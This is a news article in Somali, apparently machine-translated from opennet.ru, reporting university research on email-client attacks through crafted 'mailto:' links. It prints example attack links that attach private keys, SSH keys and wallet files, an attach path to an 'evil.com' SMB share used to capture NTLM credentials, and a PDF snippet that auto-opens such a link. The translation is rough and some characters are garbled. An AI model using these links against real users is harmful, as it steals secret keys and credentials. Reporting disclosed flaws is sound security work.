Ku-weeraridda isticmaalayaasha macmiilka iimaylka iyadoo la adeegsanayo isku-xireyaasha "mailto:".

Cilmi-baarayaal ka socda Jaamacadda Ruhr Bochum (Jarmalka) la falanqeeyay (PDF) habdhaqanka macaamiisha boostada marka la farsameynayo "mailto:" xiriiriyeyaasha leh cabbirro horumarsan. Shan ka mid ah labaatanka macmiil ee iimaylka ah ee la baadhay waxay u nuglaadeen weerar lagu khalkhaliyay beddelka kheyraadka iyadoo la adeegsanayo cabbirka "ku lifaaq". Lixda macmiil ee iimaylka ah oo dheeraad ah ayaa u nuglaaday PGP iyo S/MIME weerarka muhiimka ah, saddex macaamiil ayaa u nuglaaday weerar si ay u soo saaraan waxa ku jira fariimaha sirta ah.

Xiriirinta "mailto:"waxaa loo isticmaalaa in si otomaatig ah loogu furo furitaanka emailka macmiilka si loogu qoro warqad ciwaanka ku qeexan xiriirka. Marka lagu daro ciwaanka, waxa aad cayimi kartaa xaddigo dheeraad ah oo qayb ka ah isku xidhka, sida mawduuca warqadda iyo qaab-dhismeedka nuxurka caadiga ah. Weerarka la soo jeediyay ayaa wax ka beddelaya halbeegga "ku dheji", kaas oo kuu ogolaanaya inaad ku dhejiso lifaaqa fariinta la abuuray.

Macaamiisha boostada Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) iyo Pegasus Mail waxay u nugul yihiin weerar fudud oo kuu oggolaanaya inaad si toos ah ugu dhejiso fayl kasta oo maxalli ah, oo lagu qeexay isku xirka sida "mailto:? lifaaq=path_to_file". Faylka wuxuu ku lifaaqan yahay iyada oo aan muujin digniin, markaa iyada oo aan fiiro gaar ah lahayn, isticmaaluhu ma ogaan karo in warqadda lagu soo diri doono lifaaq.

Tusaale ahaan, adigoo isticmaalaya xiriiriye sida "mailto:[emailka waa la ilaaliyay]&subject=Title&body=Qoraalka&ku lifaaq=~/.gnupg/secring.gpg" waxaad gali kartaa furayaasha gaarka ah ee GnuPG xarafka. Waxaad sidoo kale diri kartaa waxa ku jira boorsooyinka crypto (~/.bitcoin/wallet.dat), furayaasha SSH (~/.ssh/id_rsa) iyo fayl kasta oo uu heli karo isticmaaluhu. Intaa waxaa dheer, Thunderbird waxay kuu ogolaaneysaa inaad ku dhejiso kooxo faylal ah adigoo isticmaalaya maaskaro adoo isticmaalaya dhismooyinka sida " lifaaq = / tmp / * .txt".

Marka laga soo tago faylalka maxalliga ah, macaamiisha iimaylka qaarkood waxay habeeyaan isku xirka kaydinta shabakadda iyo waddooyinka serfarka IMAP. Gaar ahaan, Xusuus-qorka IBM wuxuu kuu oggolaanayaa inaad ka wareejiso faylka tusaha shabakadda marka la shaqeynayo isku-xireyaasha sida " lifaaq = \ evil.com \ dummyfile ", iyo sidoo kale faragelinta cabbirrada xaqiijinta NTLM adoo u diraya isku xirka server-ka SMB ee uu gacanta ku hayo weerarka. (codsiga waxaa lagu soo diri doonaa isticmaalayaasha cabbiraadaha xaqiijinta ee hadda).

Thunderbird waxay si guul leh u socodsiisaa codsiyada sida " lifaaq = imap:///fetch>UID>/INBOX>1/", kaas oo kuu ogolaanaya inaad ku soo lifaaqdo macluumaadka faylalka IMAP. Isla mar ahaantaana, fariimaha laga soo helay IMAP, oo lagu sireeyay OpenPGP iyo S/MIME, ayaa si toos ah u furfuraya macmiilka boostada ka hor inta aan la dirin. Horumarinta Thunderbird waxay ahaayeen ogaysiis ku saabsan dhibaatada Febraayo iyo arrinta Thunderbird 78 dhibaatadu mar hore ayaa la hagaajiyay (laamaha Thunderbird 52, 60 iyo 68 ayaa weli ah kuwo nugul).

Noocyadii hore ee Thunderbird ayaa sidoo kale u nugul laba nooc oo kale oo weerar ah oo ku saabsan PGP iyo S/MIME oo ay soo jeediyeen cilmi-baarayaashu. Gaar ahaan, Thunderbird, iyo sidoo kale OutLook, PostBox, eM Client, MailMate iyo R2Mail2, ayaa lagu soo rogay weerar beddelaad muhiim ah, oo ay sababtay xaqiiqda ah in macmiilka boostada uu si toos ah u soo dejiyo oo u rakibo shahaadooyin cusub oo lagu gudbiyo fariimaha S/MIME, taas oo u ogolaanaysa Weeraryahanku si uu u abaabulo beddelka furayaasha dadweynaha ee uu hore u kaydiyay isticmaaluhu.

Weerarka labaad, kaas oo Thunderbird, PostBox iyo MailMate ay u nugul yihiin, waxay wax ka beddelaan sifooyinka habka loogu talagalay kaydinta farriimaha qabyada ah waxayna u oggolaanaysaa, iyada oo la adeegsanayo cabbirrada mailto, si ay u bilawdo fur-furan farriimaha sirta ah ama ku darida saxiixa dhijitaalka ah ee farriimaha aan sharciga ahayn, oo leh gudbinta ku xigta ee natiijada loo gudbinayo serverka IMAP ee soo weeraray. Weerarkan, ciphertext-ku waxa lagu kala qaadaa xadka β€œjidhka”, iyo sumadda β€œmeta refresh” waxa loo isticmaalaa in lagu bilaabo wicitaanka server-ka IMAP ee weerarka. Tusaale ahaan: ' '

Si otomaatig ah loogu habeeyo isku xirka "mailto:" iyada oo aan la isticmaalin isticmaale, dukumeenti PDF si gaar ah loo qaabeeyey ayaa la isticmaali karaa - ficilka OpenAction ee PDF wuxuu kuu ogolaanayaa inaad si toos ah u bilowdo maamulaha mailto markaad furayso dukumeenti:

%PDF-1.5
1 obj
<< /Nooca /Catalog /OpenAction [2 0 R] >>
endobj

2 obj
<< /Nooca /Action /S /URI/URI (mailto:?body=β€”β€”Bilow FARIINTA PGPβ€”β€”[…])>>
endobj

Ku weerarida isticmaalayaasha emailka macmiilka iyada oo la isticmaalayo "mailto:" links

Source: opennet.ru

Add a comment